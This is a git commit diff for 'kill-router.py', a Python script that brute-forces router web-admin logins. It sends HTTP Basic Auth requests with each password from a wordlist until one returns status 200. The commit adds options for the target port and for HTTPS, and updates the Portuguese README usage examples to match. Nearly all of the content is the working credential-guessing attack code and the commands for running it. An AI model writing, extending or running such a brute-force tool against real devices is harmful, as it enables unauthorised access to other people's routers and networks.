Adicionado porta para ataque e SSL

README.md

@@ -26,3 +26,16 @@ Método de uso:
 [!] Usage: ./kill-router.py -t [TARGET IP] -u [USER TO TEST] -p [PATH TO PASSLIST]  
 [!] Usage: ./kill-router.py -t 192.168.0.1 -u admin -p passlist.txt  
 ```
+
+```
+Especificando uma porta para o ataque:
+[!] Usage: ./kill-router.py -t [TARGET IP] -p [TARGET PORT] -u [USER TO TEST] -l [PATH TO PASSLIST]
+[!] Usage: ./kill-router.py -t 192.168.0.1 -p 8080 -u admin -l passlist.txt
+```
+
+
+```
+Utilizando ataques em URLs com SSL 
+[!] Usage: ./kill-router.py -t [TARGET IP] -p [TARGET PORT] -u [USER TO TEST] -l [PATH TO PASSLIST] -m [PROTOCOL]
+[!] Usage: [!] ./kill-router.py -t 192.168.0.1 -p 8080 -u admin -l passlist.txt -m https", 'red'
+```

kill-router.py

@@ -29,14 +29,16 @@ def usage():
 								v0.1
     """, 'red', attrs=['bold'])
     print colored("[*] By: Matheus Fidelis aka D0ctor", 'red', attrs=['bold'])
-    print colored("[!] Usage: ./kill-router.py -t [TARGET IP] -u [USER TO TEST] -p [PATH TO PASSLIST]", 'red', attrs=['bold'])
-    print colored("[!] Usage: ./kill-router.py -t 192.168.0.1 -u admin -p passlist.txt", 'red', attrs=['bold'])
+    print colored("[!] Usage: ./kill-router.py -t [TARGET IP] -p [TARGET PORT] -u [USER TO TEST] -l [PATH TO PASSLIST]", 'red', attrs=['bold'])
+    print colored("[!] Usage: ./kill-router.py -t 192.168.0.1 -p 8080 -u admin -l passlist.txt", 'red', attrs=['bold'])
+    print colored("[!] Use -m to change request HTTP to HTTPS", 'red', attrs=['bold'])
+    print colored("[!] ./kill-router.py -t 192.168.0.1 -p 8080 -u admin -l passlist.txt -m https", 'red', attrs=['bold'])
 
 
-
-
-def bruteforce(target,passlist,username):
+#FUNÇÃO RESPONSÁVEL PELO BRUTEFORCE
+def bruteforce(target,port,ssl, passlist,username):
     #Abre a passlist
+    url = '%s:%s' % (target, port)
     fd = open(passlist, 'rw')
     passwords = fd.readlines()
     passes = Queue.Queue()
@@ -48,14 +50,20 @@ def bruteforce(target,passlist,username):
     i = 0
     print ""
     print colored("==========================[STARTING TEST]==========================",'yellow', attrs=['bold'])
+    print colored("STARTING TEST ON HOST: %s",'blue', attrs=['bold']) % (url)
     print ""
 
     while not passes.empty():
         password = passes.get()
 
         i = i + 1
 
-        test = requests.get('http://'+target, auth=(username, password))
+        #AQUI IREMOS AVALIAR O PROTOCOLO, CASO ELE FOR TRUE, IRÁ REALIZAR REQUESTS COM O SSL
+        if ssl is True:
+            test = requests.get('https://'+url, auth=(username, password))
+        else:
+            test = requests.get('http://'+url, auth=(username, password))
+
         code = test.status_code
         print  colored('[%s]         USER[%s]          PASS [%s]', 'yellow') % (i,username,password)
         if code == 200:
@@ -81,15 +89,30 @@ def main():
     parser = argparse.ArgumentParser(description = "Kill Router", add_help = False)
     parser.add_argument('-h', '--help', action=usage(), help='usage')
     parser.add_argument('-t', '--target',help='Informe o roteador alvo')
-    parser.add_argument('-p', '--passlist',help='Informa a passlist')
+    parser.add_argument('-m', '--method',help='Informa o Método HTTP ou HTTPS')
+    parser.add_argument('-p', '--port',help='Informa a porta')
+    parser.add_argument('-l', '--passlist',help='Informa a passlist')
     parser.add_argument('-u','--username',help='Informa o usuário a ser testado')
     args = parser.parse_args()
 
     target = args.target
+    port = args.port
+    ssl = args.method
     passlist = args.passlist
     username = args.username
 
-    bruteforce(target,passlist,username)
+    #Força o valor padrão para 80 caso a porta não seja especificada.
+    if port is None:
+        port = 80
+
+    #Seta o valor default do method http ou https
+    if ssl is None:
+        ssl = False
+    else:
+        ssl = True
+
+
+    bruteforce(target,port,ssl, passlist,username)
 
 
 main()